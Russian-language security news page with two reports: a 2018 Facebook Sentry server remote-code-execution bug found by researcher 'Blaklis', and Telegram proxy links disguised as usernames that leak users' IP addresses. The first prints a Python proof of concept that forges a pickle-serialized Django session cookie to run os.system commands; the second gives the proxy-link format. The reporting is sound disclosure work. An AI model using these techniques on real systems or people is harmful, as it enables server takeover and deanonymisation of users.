Баг на сервере Facebook позволял удаленно запустить вредоносный код

Олег Иванов 28 Августа 2018 - 10:08

...

Баг на сервере Facebook позволял удаленно запустить вредоносный код

Разработчики Facebook исправили серьезный баг, который мог привести к удаленному выполнению кода. Сама уязвимость была обнаружена на одном из серверов интернет-гиганта, о чем сообщил исследователь безопасности Дэниел Ле Галл, также известный под псевдонимом «Blaklis».

Ле Галл, работающий в SCRT Information Security, в пятницу заявил, что ему выплатили $5000 за сообщение о проблеме безопасности.

Суть уязвимости в том, что злоумышленник может выполнить произвольные команды, используя вредоносные файлы cookie.

Несмотря на то, что подобные бреши обычно довольно опасны, эксперт подчеркнул, что с помощью этого бага нельзя было получить пользовательские данные. Разработчики устранили уязвимость в этом месяце, еще до того, как была опубликована информация о ее наличии.

«Blaklis» утверждает, что недостаток был найден на одном из серверов Facebook, где было запущено программное обеспечение для сбора логов Sentry.

«Само приложение было крайне нестабильным, особенно в отношении функции сброса пароля пользователя», — объясняет специалист.

В итоге Ле Галлу удалось найти в логах детали обработки cookie, а также подробности использования приложением протокола Pickle, который может быть уязвим для различного рода манипуляций. Используя все вышеозначенные данные, эксперт мог обработать файлы cookie, которые могли запускать команды на машине.

Исследователь опубликовал PoC-код, который является небольшим файлом cookie:

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os
SECRET_KEY='[RETRIEVEDKEY]'
#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()
print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)

Следующая главная новость »

Карьера в информационной безопасности. Что ждёт в 2026 году? Обсудим на эфире AM Live, присоединяйтесь! »

Екатерина Быстрова 12 Января 2026 - 21:22

Ошибки конфигурации программ Домашние пользователи

Замаскированные ссылки в Telegram позволяют деанонимизировать людей

Даже один, казалось бы, безобидный клик в Telegram может обернуться утечкой реального IP-адреса. Исследователи обнаружили, что специально сформированные прокси-ссылки позволяют злоумышленникам деанонимизировать пользователя — без дополнительных подтверждений и предупреждений. После публикаций об этом Telegram пообещал добавить предупреждения при открытии таких ссылок.

Как выяснилось, клиенты Telegram на Android и iOS автоматически пытаются подключиться к прокси-серверу, если пользователь нажимает на ссылку формата t.me/proxy?.... Причём соединение происходит напрямую, ещё до добавления прокси в настройки.

Proxy-ссылки Telegram предназначены для быстрой настройки MTProto-прокси — их часто используют для обхода блокировок и сокрытия реального местоположения. Обычно такая ссылка выглядит так:

t.me/proxy?server=IP&port=PORT&secret=SECRET

Но, как показали исследователи, такую ссылку легко замаскировать под обычное имя пользователя или «безопасный» URL. В сообщении она может выглядеть, например, как @username, хотя на самом деле ведёт на прокси-настройку.

Если пользователь нажимает на такую ссылку с телефона, Telegram автоматически проверяет доступность прокси, отправляя сетевой запрос напрямую с устройства. В результате владелец прокси-сервера получает реальный IP-адрес жертвы.

«Telegram автоматически пингует прокси до его добавления, запрос идёт в обход всех настроек, и реальный IP логируется мгновенно», — описывают механизм исследователи. Они называют это «тихой и эффективной точечной атакой».

Раскрытый IP-адрес можно использовать для определения примерного местоположения пользователя, таргетированных атак, DDoS или дальнейшего профилирования. Особенно опасной эта проблема выглядит для журналистов, активистов и пользователей, которые изначально используют Telegram и прокси именно ради анонимности.

Ситуацию впервые подробно описал телеграм-канал chekist42, а затем её подхватили исследователи и OSINT-аккаунты в X, опубликовав видеодемонстрации атаки.

В Telegram не считают происходящее полноценной уязвимостью. В компании заявили, что любой сайт или прокси-сервер в интернете может видеть IP-адрес посетителя, и это якобы не делает ситуацию уникальной.

«Любой владелец сайта или прокси видит IP-адрес пользователя вне зависимости от платформы. Это не более актуально для Telegram, чем для WhatsApp (принадлежит Meta, признанной экстремистской и запрещенной в России) или других сервисов», — сообщили в Telegram BleepingComputer.

Тем не менее разработчики признали риски и пообещали добавить предупреждения при переходе по прокси-ссылкам, чтобы пользователи понимали, что именно они открывают. Когда именно это появится в клиентах — пока не уточняется.

Пока предупреждений нет, эксперты советуют быть особенно осторожными:

не кликать по подозрительным ссылкам t.me, даже если они выглядят как имена пользователей;
помнить, что прокси-ссылки могут быть замаскированы под обычный текст;
особенно внимательно относиться к таким ссылкам на мобильных устройствах.

Карьера в информационной безопасности. Что ждёт в 2026 году? Обсудим на эфире AM Live, присоединяйтесь! »